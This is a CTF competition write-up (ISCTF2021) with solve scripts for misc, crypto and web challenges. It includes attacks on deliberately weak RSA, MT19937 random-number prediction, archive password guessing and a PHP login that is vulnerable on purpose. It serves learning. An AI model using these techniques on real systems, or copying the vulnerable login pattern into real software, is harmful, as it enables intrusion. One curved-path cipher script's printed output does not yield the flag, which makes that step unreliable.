ISCTF2021

MISC

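Misc Sign-in

Author: 啊罗小黑战记停更了

School: Jiaozuo University

Handsome guys and pretty girls, have you thought about decrypting this string? Maybe try working out the md5 in your head, or maybe it's base32/64... Guess right and I'll let you hehehe... by: 啊罗小黑战记停更了 (QQ: 1813785342) <-- this is the challenge author, go find him, hehehe
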
SVNDVEZ7aHVhbl95aW5nX2xhaV9kYW9fQ1RGX2RlX3NoaV9qaWV9

Base64-decode it:
ISCTF{huan_ying_lai_dao_CTF_de_shi_jie}

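The Goddess's Mockery

Author: f1@g

School: Henan Polytechnic University

Challenge description: You confess to the goddess you have admired for so long, and this is how she replies...

The flag format is flag{.*}

Strip out all the text, then decode the remaining Ook! code: https://www.splitbrain.org/services/ook

Then Base64-decode the result:
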
┌──(kali㉿kali)-[~/桌面]
└─$ echo ZmxhZ3sxX0kwVmVfeTB1X3Qwb30= | base64 -d
flag{1_I0Ve_y0u_t0o}

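I'm Falling Apart

I hear that... if you reply "ISCTF" to me I can give you the flag, but first you have to do me a favor, because I've fallen apart!!!

Just search for the WeChat official account: 蓝鲨信息
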
ISCTF{WelC0me_2_ISCTF_ANd_Have_FuN}

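Is What You Downloaded Really an Image?

Author: Shangu

School: Pingdingshan University

Challenge description: Do you believe in the light?

Shangu has hidden a "trojan virus" in the image. Did he defeat the little monster this time?

Change the extension to .zip and extract it, then change the extension to .zip again.

flag
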
ISCTF{W0w!_Y0u_aRe_So_C1ear!}

Welcome To ISCTF World

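Authors: f00001111, xiaobai

Schools: Dali University, Xinyang Normal University

Challenge description: Welcome to the ISCTF world

Attachment: https://share.weiyun.com/ISvTkLqF

Play the game to find the flag:
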
flag part 1:ISCTF{e7c70265
flag part 2:-6a76-4617-bc64
flag part 3:-73f5
flag part 4:e3fdce60}

flag

ISCTF{e7c70265-6a76-4617-bc64-73f5e3fdce60}

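Login Traffic Analysis

Author: 李黑子

School: Zhoukou Vocational and Technical College

Challenge description: Xiao Ming forgot his password. Here is traffic captured when Xiao Ming logged in earlier; please help him find the login password in it.

Search for "pass", then follow the HTTP stream to find the flag.

flag
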
ISCTF{y723rt3132f88v4}

Simple Image Steganography

Author: 啊罗小黑战记停更了

School: Jiaozuo University

Challenge description: A simple kind of image steganography

zsteg solves it directly:

┌──(kali㉿kali)-[~/桌面]
└─$ zsteg 1.png
[!] ZPNG::ScanLine: #1036: no data at pos 0, scanline dropped
[!] ZPNG::ScanLine: #1037: no data at pos 0, scanline dropped
imagedata .. text: "ISCTF{chu_fa_cai_hong_hai}"
b1,rgba,lsb,xy .. text: "UUUUU]UUUUUy"
b2,r,lsb,xy .. text: "UUUUUUUUUUUUUUUUUV"
b2,r,msb,xy .. text: "jUUUUUUUUUUUUUUU"
b2,g,lsb,xy .. text: "UUUUUUUUP"
b2,g,msb,xy .. text: "ZUUUUUUU"
b2,b,lsb,xy .. text: "UUUUUUUU_"
b2,rgba,lsb,xy .. text: ["o" repeated 10 times]
b4,r,lsb,xy .. text: "\"33333DDDDDEfffffgwwwwy"
b4,g,lsb,xy .. text: "\"\"\"\"#3333333DDDDDDfffffffffffgwx"
b4,g,msb,xy .. text: ["w" repeated 10 times]
b4,b,lsb,xy .. text: ["w" repeated 10 times]
b4,b,msb,xy .. text: "UUUUUUUUUUU=3333"

easy_osint

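Author: Xi0a

School: Yunnan Police College

Challenge description: This keeps showing up in my WeChat Moments lately. I hear it was taken in a square; where is this?

Example flag: ISCTF{七花广场}

A Baidu reverse image search identifies it as 金碧广场.

flag
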
ISCTF{金碧广场}

The Injured QR Code and Ear

Open the spectrogram; it shows Morse code:

-.-- ----- ..- ..-. .. -. -.. -- .

Decoding the Morse code gives: Y0UFINDME

Then piece the QR code together.

Scanning it gives: ISCTF{U_f0und_The_half

Final flag

ISCTF{U_f0und_The_half_Y0U_FIND_ME}

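File? Beauty?

Extracting the archive gives a file named flag; opening it in 010 Editor shows it is a byte-reversed JPG.

# Reverse the bytes of 'flag' to restore the JPG
with open('flag', 'rb') as src:
    data = src.read()
with open('flag.jpg', 'wb') as dst:
    dst.write(data[::-1])

foremost carves out a password-protected archive; a dictionary attack finds the weak password admin123. Ugh.
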
ISCTF{5ecdfs-avcsefh-dhvldncmd}

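Is What You Downloaded Really an Image? -2

The Blue channel looks abnormal.

Save it as txt; the trailing values need to be extracted and then saved as a zip.

Delete the last line.

# Keep the last 18 characters of every line (the trailing values), strip the spaces, and write them to out1.txt
a = ""
with open('zip.txt', 'r') as f, open('out1.txt', 'w') as ff:
    for line in f.readlines():
        a = (a + line[-18:]).replace(" ", "")
    ff.write(a)

Paste the result into 010 Editor as hex text and save it as a zip.

flag.txt
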
Lorem ipsum dolori sit amet, consecteturs adipiscing celit, sed dot eiusmod tempor incifdidunt ut labore et dolore magna aliquam. Ut enim ad minimf veniam, quisi nostrud exercitation ullamcoo laboris nisis ut aliquip ex eai commodos consequat. Duis caute irure dolor in reprehenderit in voluptate velit oesse cillum dolore eu fugiat nulla pariatur. Excepteur osint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim lid est laborum.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

The two lines differ in length; the missing letters are isctfmfiosiscool

flag:

ISCTF{isctfmfiosiscool}

CRYPTO

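The Winding Road

Author: YYGP

School: Dali University

Challenge description: A classical blue shark set out from the far end of a road and walked the winding path up, down, up, down, up, passing 5 trees and 5 banks.
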
}I_cFTle_FToneCSWnTC5@0{I

Following the hint, split it into groups of five, which gives five groups:
}I_cF
Tle_F
ToneC
SWnTC
5@0{I

Using the flag format ISCTF and reading in the order the hint describes gives the flag:

ISCTF{Welc0nne_@To_I5CTF}

Intended solution: decrypt with a 曲路密码 (curved-path cipher) script

# written 2021/8/4
# 曲路密码 (curved-path cipher)
import re


def encrypt_bend(string, col, row=10):
    ciphertext = ""
    temp = []
    for i in range(col):
        temp.append([])
    for index, i in enumerate(string):
        temp[index % col].append(i)
    re_temp = list(reversed(temp))
    for index, i in enumerate(re_temp):
        if index % 2 == 0:
            i = list(reversed(i))
        ciphertext += "".join(i)
    return ciphertext


def decrypt_bend(string, col, row=10):
    plaintext = ""
    length = len(string)
    min_row = length // col  # minimum number of rows
    min_num = col - length % col  # number of columns that have the minimum row count
    # split into groups
    temp = []
    index = 0
    for i in range(col):
        if i < min_num:
            temp.append(string[index:index+min_row])
            index += min_row
        else:
            temp.append(string[index:index+min_row+1])
            index += min_row + 1
    print(temp)
    # restore the column order
    for index, i in enumerate(temp):
        if index % 2 == 0:
            # print(re.findall(".{1}", temp[index]))
            temp[index] = "".join(list(reversed(re.findall(".{1}", temp[index]))))
    temp.reverse()
    for i in range(length):
        plaintext += temp[i % col][i // col]
    return plaintext


if __name__ == '__main__':
    col_ = 7
    row_ = 5
    # ciphertext_ = encrypt_bend("i will beat you this day", col_, row_)
    ciphertext_ ='}I_cFTle_FToneCSWnTC5@0{I'
    plaintext_ = decrypt_bend(ciphertext_, col_, row_)
    print(f"{plaintext_} : {ciphertext_}")



['}I_', 'cFT', 'le_', 'FTon', 'eCSW', 'nTC5', '@0{I']
InWF_c_{TSTeFI0CColT}@5en : }I_cFTle_FToneCSWnTC5@0{I

EasyRSA

Factor n with yafu to obtain p, q and r:

***factors found***

P10 = 2514358789

P10 = 2930880917

P155 = 10728308687033142242263042720863820844383961098139391476856378846439202568058060175330323889963293720874263174254928466703829537388987357384056877938482683


ans = 1

It's a simple one, so just solve it directly:

from Crypto.Util.number import *
import gmpy2

n= 79059977083433369161977159472257563109008119475755288439774758824887836857424336032518651862088590700241980200158542855762122262156445632897757444422514158062996501037323379
e= 65537
c= 31573591986915001857640263466939164206307247748465148395978810720215094970707002043721991055789084518831540652652824225863275289979959264564070907438540016782921324316795681

p= 2514358789
q = 2930880917
r = 10728308687033142242263042720863820844383961098139391476856378846439202568058060175330323889963293720874263174254928466703829537388987357384056877938482683

phi_n=(p-1)*(q-1)*(r-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)

print(long_to_bytes(m))


flag:ISCTF{Welcome_To_RSA_puzzles}

MediumRSA

p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623

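A typical case where e and phi are not coprime: e and phi share a common factor, and that common factor is not e itself.

BUU has the original version of this challenge; adapt its script and run it:

import gmpy2
from Crypto.Util.number import *


# Case where e becomes coprime to phi once their common factor is divided out
def decrypt(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gmpy2.gcd(e, phi)
    d = gmpy2.invert(e // t, phi)
    # m is the plaintext raised to the power t (mod n)
    m = pow(c, d, n)
    # print(m)
    # take the integer t-th root; msg[1] is True when the root is exact
    msg = gmpy2.iroot(m, t)
    print(msg)
    if msg[1]:
        print(long_to_bytes(msg[0]))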

p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623

decrypt(p, q, e, c)


b'ISCTF{RSA_Is_Fun233}'

Script 2:

import gmpy2
from Crypto.Util.number import *
p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
n = p * q
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623
phi = (p-1)*(q-1)
a = gmpy2.gcd(e,phi)
#print(a)
e = e//a
d = gmpy2.invert(e,phi)
m6 = gmpy2.powmod(c,d,n)
print(long_to_bytes(gmpy2.iroot(m6,6)[0]))


b'ISCTF{RSA_Is_Fun233}'

HardRSA1*

from Crypto.Util.number import *
flag=b'****************************'
m1 = bytes_to_long(flag)
N = getPrime(512)*getPrime(512)
e = 19

c1 = pow(m1, e, N)

a = getRandomNBitInteger(512)
b = getRandomNBitInteger(512)
m2 = a*m1 + b
c2 = pow(m2, e, N)

print(N, a, b, c1, c2, sep="\n")
# N=95587878777633457712771077861034164878218007211732872086703082427025284038734073722525350247252021434969755949232136071401015995927195956787389015816040788670336377590142763231354554070366181264021083507258416574251611662836423194484700341105611819435848709315571900313318932989155213069438624597581376096919
# a=8148274285376731469630646414567940438407613039123927029192149790588715641540606813881834241911738725252707074817442402177237967817804420371483845842902231
# b=9944999010165189354017274928734887652060645960820869672700674403006764312275448509638591901570545531313058741811202384719307206506483462331704719044400878
# c1=1870704366656953386352816295794415188411021228249016204037205250475471490295719163599101603443054766225481004510415813930027376456511655528372027273843117886139717834189065273068836018423957958033253086582500645476025731783186122169863569195566258360470326607481719859396822157309140555156145108464948303484
# c2=73255380295741602810215998117368212335852087176390783730568276178375345944401489472119142216343959193098593837507600341773896221941166940563956033779653381698066185496693623741658031273011213568043342267706206340976896722388323992521780876436269830484416265647861652562217726795508745205674083028929318260061

HardRSA2

from Crypto.Util.number import *
flag = b'*****************************************'
p=getPrime(256)
q=getPrime(256)
n=p*q
e=3
c1=pow(bytes_to_long(flag),e,n)
c2=pow(bytes_to_long(flag)+1,e,n)
print("n=",n)
print("e=",e)
print("c1=",c1)
print("c2=",c2)

We are given n, e=3, the ciphertext c1 of m, and the ciphertext c2 of (m+1).
Just plug the values into the closed-form formula; it also makes the script easy to write:

exp:

import gmpy2
from Crypto.Util.number import *
# Closed form for e=3: with c2 = M^3 and c1 = (a*M + b)^3 mod n, returns M
def getM2(a,b,c1,c2,n):
    a3 = pow(a,3,n)
    b3 = pow(b,3,n)
    first = c1-a3*c2+2*b3
    first = first % n
    second = 3*b*(a3*c2-b3)
    second = second % n
    third = second*gmpy2.invert(first,n)
    third = third % n
    fourth = (third+b)*gmpy2.invert(a,n)
    return fourth % n
a = 1
b = -1
c1 = 2472980534576281392558886476940549411151541741395435035178216067058424274579199860482131340986643214114691172763529231832373323600612645856564185998644266
c2 =3187049937811823373965320946136219840500070255491222077303817795527750241053576957767965313420456458983759851110615696314773380132732017115202532855996999
n = 4204420773617479943564859167286821133009223627804172573263590117785622718525161236597233398439402100826272190957218464786259692632804955516979471884796171
m = a*getM2(a,b,c1,c2,n) + b
print(m)
flag = long_to_bytes(m)
print(flag)



2627677351174352521228982698389418302338831226796241650558277555097107627042754252273675470990465824942973
b'ISCTF{U_n0w_kn0w_Related_information_attack}'
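
The closed-form solve above is the e=3 case of the Franklin-Reiter related-message attack. As an added example (not part of the original write-up), the sketch below goes beyond that case: it handles any small e and any known relation m2 = a*m1 + b, the layout HardRSA1 uses with e = 19, by taking a polynomial GCD mod n. The modulus, message, a and b are constructed toy values and the function names are this example's own; it shows why textbook RSA without randomized padding such as OAEP must not encrypt related messages.

```python
# Added example: related-message recovery for textbook RSA via polynomial GCD mod n.
# Polynomials are coefficient lists, lowest degree first. All values are constructed.
from math import comb


def trim(p):
    """Remove zero coefficients from the high-degree end (in place)."""
    while p and p[-1] == 0:
        p.pop()
    return p


def monic(p, n):
    """Scale p so that its leading coefficient is 1 mod n."""
    inv = pow(p[-1], -1, n)  # ValueError if the coefficient shares a factor with n
    return [c * inv % n for c in p]


def poly_rem(f, g, n):
    """Remainder of f divided by the monic polynomial g, coefficients mod n."""
    f = f[:]
    while len(f) >= len(g):
        lead, shift = f[-1], len(f) - len(g)
        for i, c in enumerate(g):
            f[shift + i] = (f[shift + i] - lead * c) % n
        trim(f)  # the top coefficient is now zero, so f gets shorter every pass
    return f


def poly_gcd(f, g, n):
    """Monic GCD of f and g over Z_n by the Euclidean algorithm."""
    f, g = trim(f[:]), trim(g[:])
    while g:
        g = monic(g, n)
        f, g = g, poly_rem(f, g, n)
    return f


def recover_related(n, e, a, b, c1, c2):
    """Return m1 given c1 = m1^e and c2 = (a*m1 + b)^e mod n, with a and b known."""
    # f(x) = x^e - c1 and g(x) = (a*x + b)^e - c2 both vanish at x = m1.
    f = [(-c1) % n] + [0] * (e - 1) + [1]
    g = [comb(e, k) * pow(a, k, n) * pow(b, e - k, n) % n for k in range(e + 1)]
    g[0] = (g[0] - c2) % n
    d = poly_gcd(f, g, n)
    if len(d) != 2:
        raise ValueError("no unique common root; the messages are not related by (a, b)")
    return -d[0] % n  # d(x) = x - m1


# Constructed toy parameters: two Mersenne primes, a short message, arbitrary a and b.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
M1 = int.from_bytes(b"ISCTF{toy_flag}", "big")
A, B = 0x1F3A5C7E9B, 0x2468ACE13579


def demo(e=19, a=A, b=B):
    """Encrypt M1 and a*M1 + b, then recover M1 from public values only."""
    c1 = pow(M1, e, N)
    c2 = pow(a * M1 + b, e, N)
    return recover_related(N, e, a, b, c1, c2)


if __name__ == "__main__":
    print(demo().to_bytes(15, "big"))
    print(demo(3, 1, 1).to_bytes(15, "big"))  # the e=3, m and m+1 layout of HardRSA2
```
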

Circular Game

It is a Vigenère cipher; it decrypts to yunnanuniversity, which is used as the password to open the kz.zip archive.

cipher.txt

└─$ cat cipher.txt    
Vt9T2BKcJR647T6jmomlLEt0WEDBXVfrk0/oSXLtOTRpZgKyyMo9jKbBByR3L5zuiqh31FbJ7Yb41D1VSU2y7biQNnaByDPj5FHr96hxEEupxRXPTgyoKUb1QCLU1YbpJvzUHPELPsBwyMnLBQxDCrid1mkJ4nP+ZcoI8UzXGlNGTJgYjOV1txv9/9UKsfvtdhrSuogyQ7dY/935bB/B6+3mWFX/XpN68O6vRJqwoY66fBQv+cp2xMY43hzs/7q+R10O3wz98s7BNQjgV4isGVWfp5yAgu2/DAj1Ww13zTthqCJ6XFrC4Jz+RiiLsqpxiB6HzOsd7YzJ3cWDHH1leA==

public_key.pem

└─$ cat public_key.pem
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq+m7iHurBa9G8ujEiTpZ
71aHOVNhQXpd6jCQNhwMN3hD6JHkv0HSxmJwfGe0EnXDtjRraWmS6OYzT4+LSrXs
z9IkWGzRlJ4lC7WHS8D3NWIWYHCP4TRt2N0TlWXWm9nFCrEXqQ3IWgYQpQvKzsds
etnIZJL1tf1wQzGE6rbkbvURlUBbzBSuidkmi0kY5Qxp2Jfb6OUI647zx2dPxJpD
ffSCNffVIDUYOvrgYxIhs5HmCF3XECC3VfaKtRceL5JM8R0qz5nVU2Ns8hPvSVP+
7/i7G447cjW151si0joB7RpBplu44Vk8TXXDAk0JZdW6KwJn7ITaX04AAAAAAAAA
AQIDAQAB
-----END PUBLIC KEY-----

Adapted from the 攻防世界 challenge Handicraft_RSA

Extract the public key:

┌──(kali㉿kali)-[~/桌面/kz]
└─$ openssl rsa -pubin -text -modulus -in warmup -in public_key.pem
RSA Public-Key: (2048 bit)
Modulus:
00:ab:e9:bb:88:7b:ab:05:af:46:f2:e8:c4:89:3a:
59:ef:56:87:39:53:61:41:7a:5d:ea:30:90:36:1c:
0c:37:78:43:e8:91:e4:bf:41:d2:c6:62:70:7c:67:
b4:12:75:c3:b6:34:6b:69:69:92:e8:e6:33:4f:8f:
8b:4a:b5:ec:cf:d2:24:58:6c:d1:94:9e:25:0b:b5:
87:4b:c0:f7:35:62:16:60:70:8f:e1:34:6d:d8:dd:
13:95:65:d6:9b:d9:c5:0a:b1:17:a9:0d:c8:5a:06:
10:a5:0b:ca:ce:c7:6c:7a:d9:c8:64:92:f5:b5:fd:
70:43:31:84:ea:b6:e4:6e:f5:11:95:40:5b:cc:14:
ae:89:d9:26:8b:49:18:e5:0c:69:d8:97:db:e8:e5:
08:eb:8e:f3:c7:67:4f:c4:9a:43:7d:f4:82:35:f7:
d5:20:35:18:3a:fa:e0:63:12:21:b3:91:e6:08:5d:
d7:10:20:b7:55:f6:8a:b5:17:1e:2f:92:4c:f1:1d:
2a:cf:99:d5:53:63:6c:f2:13:ef:49:53:fe:ef:f8:
bb:1b:8e:3b:72:35:b5:e7:5b:22:d2:3a:01:ed:1a:
41:a6:5b:b8:e1:59:3c:4d:75:c3:02:4d:09:65:d5:
ba:2b:02:67:ec:84:da:5f:4e:00:00:00:00:00:00:
00:01
Exponent: 65537 (0x10001)
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq+m7iHurBa9G8ujEiTpZ
71aHOVNhQXpd6jCQNhwMN3hD6JHkv0HSxmJwfGe0EnXDtjRraWmS6OYzT4+LSrXs
z9IkWGzRlJ4lC7WHS8D3NWIWYHCP4TRt2N0TlWXWm9nFCrEXqQ3IWgYQpQvKzsds
etnIZJL1tf1wQzGE6rbkbvURlUBbzBSuidkmi0kY5Qxp2Jfb6OUI647zx2dPxJpD
ffSCNffVIDUYOvrgYxIhs5HmCF3XECC3VfaKtRceL5JM8R0qz5nVU2Ns8hPvSVP+
7/i7G447cjW151si0joB7RpBplu44Vk8TXXDAk0JZdW6KwJn7ITaX04AAAAAAAAA
AQIDAQAB
-----END PUBLIC KEY-----

Converting the Modulus value to decimal gives n; then factor n to get p and q.

exp:

from Crypto.Util.number import *
from Crypto.PublicKey import RSA
import gmpy2
import base64

#pub = RSA.importKey(open('public_key.pem').read())
#n = pub.n
#e = pub.e

e=65537
n=21702007965967851183912845012669844623756908507890324243024055496763943595946688940552416734878197459043831494232875785620294668737665396025897150541283087580428261036967329585399916163401369611036124501098728512558174430431806459204349427025717455575024289926516646738721697827263582054632714414433009171634156535642801472435174298248730890036345522414464312932752899972440365978028349224554681969090140541620264972373596402565696085035645624229615500129915303416150964709569033763686335344334340374467597281565279826664494938820964323794098815428802817709142950181265208976166531957235913949338642042322944000000001
p = 139457081371053313087662621808811891689477698775602541222732432884929677435971504758581219546068100871560676389156360422970589688848020499752936702307974617390996217688749392344211044595211963580524376876607487048719085184308509979502505202804812382023512342185380439620200563119485952705668730322944000000001
q = 155617827023249833340719354421664777126919280716316528121008762838820577123085292134385394346751341309377546683859340593439660968379640585296350265350950535158375685103003837903550191128377455111656903429282868722284520586387794090131818535032744071918282383650099890243578253423157468632973312000000000000001

d = gmpy2.invert(e,(p-1)*(q-1))

msg = base64.b64decode("Vt9T2BKcJR647T6jmomlLEt0WEDBXVfrk0/oSXLtOTRpZgKyyMo9jKbBByR3L5zuiqh31FbJ7Yb41D1VSU2y7biQNnaByDPj5FHr96hxEEupxRXPTgyoKUb1QCLU1YbpJvzUHPELPsBwyMnLBQxDCrid1mkJ4nP+ZcoI8UzXGlNGTJgYjOV1txv9/9UKsfvtdhrSuogyQ7dY/935bB/B6+3mWFX/XpN68O6vRJqwoY66fBQv+cp2xMY43hzs/7q+R10O3wz98s7BNQjgV4isGVWfp5yAgu2/DAj1Ww13zTthqCJ6XFrC4Jz+RiiLsqpxiB6HzOsd7YzJ3cWDHH1leA==")
key = RSA.construct((int(n),int(e),int(d),int(p),int(q)))
'''for i in range(20):
    enc = key.decrypt(msg)
    msg = enc
    print(msg)
'''
msg = bytes_to_long(msg)
for i in range(100):
    enc = pow(msg,d,n)
    msg = enc
    if b"ISCTF" in long_to_bytes(msg):
        print(long_to_bytes(msg))



b'ISCTF{Cyc1ic_encrypt10n_4_y0u}'

Do_u_know_coding

School: Fujian Normal University

Challenge hints:

Base64 variation

5 levels in total

494n4n56453244524n464544475353534q4n5747343644524n5n4q5647544o32495634544o57434n4r563256455253484s464n584153434s47464r46455n3353494q59584o5n4o4r4o424r4755333253494646454q5344594r453q3q3q3q3q3q

ROT13:
494a4a56453244524a464544475353534d4a5747343644524a5a4d5647544b32495634544b57434a4e563256455253484f464a584153434f47464e46455a3353494d59584b5a4b4e4b424e4755333253494646454d5344594e453d3d3d3d3d3d

hex:
IJJVE2DRJFEDGSSSMJWG46DRJZMVGTK2IV4TKWCJNV2VERSHOFJXASCOGFNFEZ3SIMYXKZKNKBNGU32SIFFEMSDYNE======

Base32:
BSRhqIH3JRblnxqNYSMZEy5XImuRFGqSpHN1ZRgrC1ueMPZjoRAJFHxi

Caesar shift 13:
OFEudVU3WEoyakdALFZMRl5KVzhESTdFcUA1MEteP1hrZCMwbENWSUkv

Base64:
8Q.uU7XJ2jG@,VLF^JW8DI7Eq@50K^?Xkd#0lCVII/

ASCII85 decode:
ISCTF{W0w_y0u_c4n_rea11y_c0d1ng!}
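
The layer sequence listed above, as an added Python example (not part of the original write-up): it applies each decoder in the stated order to the challenge string and keeps every intermediate value so each step can be checked against the text. The helper names are this example's own.

```python
# Added example: peel the encoding layers of Do_u_know_coding one at a time.
import base64
import codecs

# Challenge string from the write-up, split into 16-character pieces for readability.
CHALLENGE = (
    "494n4n5645324452" "4n46454447535353" "4q4n574734364452"
    "4n5n4q5647544o32" "495634544o57434n" "4r56325645525348"
    "4s464n584153434s" "47464r46455n3353" "494q59584o5n4o4r"
    "4o424r4755333253" "494646454q534459" "4r453q3q3q3q3q3q"
)


def rot13(text):
    """Rotate letters by 13; digits and punctuation pass through unchanged."""
    return codecs.encode(text, "rot_13")


def from_hex(text):
    return bytes.fromhex(text).decode("ascii")


def from_base32(text):
    return base64.b32decode(text).decode("ascii")


def from_base64(text):
    # validate=True rejects characters outside the Base64 alphabet instead of skipping them
    return base64.b64decode(text, validate=True).decode("ascii")


def from_ascii85(text):
    return base64.a85decode(text).decode("ascii")


# Layer order as listed in the write-up.
LAYERS = [
    ("ROT13", rot13),
    ("hex", from_hex),
    ("Base32", from_base32),
    ("Caesar 13", rot13),
    ("Base64", from_base64),
    ("ASCII85", from_ascii85),
]


def peel(blob, layers=LAYERS):
    """Apply each decoder in turn and return [(layer name, text after that layer), ...].

    A decoder raises when it is given the wrong kind of input, so a failure
    points at the first layer whose assumed encoding does not match.
    """
    stages = []
    for name, decode in layers:
        try:
            blob = decode(blob)
        except ValueError as exc:  # binascii.Error and UnicodeDecodeError are ValueErrors
            raise ValueError(f"layer {name!r} failed: {exc}") from exc
        stages.append((name, blob))
    return stages


if __name__ == "__main__":
    for name, text in peel(CHALLENGE):
        print(f"{name:>9}: {text}")
```
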

RdEs

Author: YYGP

School: Dali University

Challenge description: The first 624 are all different blue sharks; can you tell what the 625th blue shark is?

Seeing 624 generated random numbers makes this easy: it is MT19937 random number prediction.
Prediction needs the first 624 outputs, which are exactly what output.txt contains, so just reuse a script and run it:

from random import Random

o = 9999999999999999999999999999999999999999999999999999999999999
# right shift inverse
def inverse_right(res, shift):
    tmp = res
    bits=len(bin(res)[2:])
    for i in range(bits // shift):
        tmp = res ^ tmp >> shift
    return tmp

# right shift with mask inverse
def inverse_right_mask(res, shift, mask):
    tmp = res
    bits=len(bin(res)[2:])
    for i in range(bits // shift):
        tmp = res ^ tmp >> shift & mask
    return tmp

# left shift inverse
def inverse_left(res, shift):
    tmp = res
    bits=len(bin(res)[2:])
    for i in range(bits // shift):
        tmp = res ^ tmp << shift
    return tmp

# left shift with mask inverse
def inverse_left_mask(res, shift, mask):
    tmp = res
    bits=len(bin(res)[2:])
    for i in range(bits // shift):
        tmp = res ^ tmp << shift & mask
    return tmp

# undo the MT19937 output tempering, last step first
def recover(y):
    y = inverse_right(y,18)
    y = inverse_left_mask(y,15,4022730752)
    y = inverse_left_mask(y,7,2636928640)
    y = inverse_right(y,11)
    return y

# rebuild a Random object from 624 recovered state words
def clone_mt(record):
    state = [recover(i) for i in record]
    gen = Random()
    gen.setstate((3,tuple(state+[0]),None))
    return gen

f = open(r"预测.txt",'r').readlines()
prng = []
for i in f:
    prng.append(int(i.strip("\n")))

g = clone_mt(prng[:624])
for i in range(700):
    g.getrandbits(32)

key = g.getrandbits(32)
print(key)
# predicted result: 3763948799

The number it prints is the key for this challenge.
Next, look at the remaining AES encryption.

Decrypt with a script to get the flag directly:

import base64
from Crypto.Cipher import AES


def add_to_32(value):
    while len(value) % 32 != 0:
        value += '\0'
    return str.encode(value)  # return bytes


def add_to_16(value):
    while len(value) % 16 != 0:
        value += '\0'
    return str.encode(value)  # return bytes


def decrypt_oralce(text):
    # key
    key = '3763948799'
    # ciphertext
    # initialize the cipher
    aes = AES.new(add_to_16(key), AES.MODE_ECB)
    # first decode the Base64 back into bytes
    base64_decrypted = base64.decodebytes(text.encode(encoding='utf-8'))
    # decrypt, then decode the result and return it as str
    decrypted_text = str(aes.decrypt(base64_decrypted), encoding='utf-8').replace('\0', '')
    print('decrypted_text', decrypted_text)
    return decrypted_text


if __name__ == '__main__':
    text = '''{'aaa': '111', 'bbb': '222'}'''

    decrypt_oralce("BYIlzaPnImGZeWVpn+QudBiZEwlaA3H3rl69STD8/tQ=")

flag:

ISCTF{AE5_AnD_ranD0m}

鲨米尔 (Shamir)*

500

Author: YYGP

School: Dali University

Challenge description: 鲨米尔 has 5 doors, and it seems I only need to know 3 of them to get in

WEB

Web Sign-in

Author: 0000FF

School: Dali University

Challenge description: js

http://isctf.mcsog.tk:10004/

Press Ctrl+U to view the page source:

<!-- ISCTF{mf_woDichaoRen!} -->

New flag:
<!-- ISCTF{885b0389-3d86-4c8b-8e95-846829ed6918} -->

The Careless Little Blue Shark

Author: f1@g

School: Henan Polytechnic University

Challenge description: The careless little blue shark has forgotten his account password; can you help him?

http://isctf.mcsog.tk:10000/

Log in with admin/123456:

<?php
error_reporting(0);
if (isset($_POST['username']) && isset($_POST['password'])) {
    $name=$_POST["username"];
    $pwd=$_POST["password"];
    $logined = true;
    $flag = 'XXXX';
    include("flag.php");

    if (!ctype_alpha($name)) {$logined = false;}
    if (!is_numeric($pwd) ) {$logined = false;}
    if (md5($name) != md5($pwd)) {$logined = false;}

    if ($logined){
        echo "<h1>"."login successful"."<p>".$flag;
    }else{
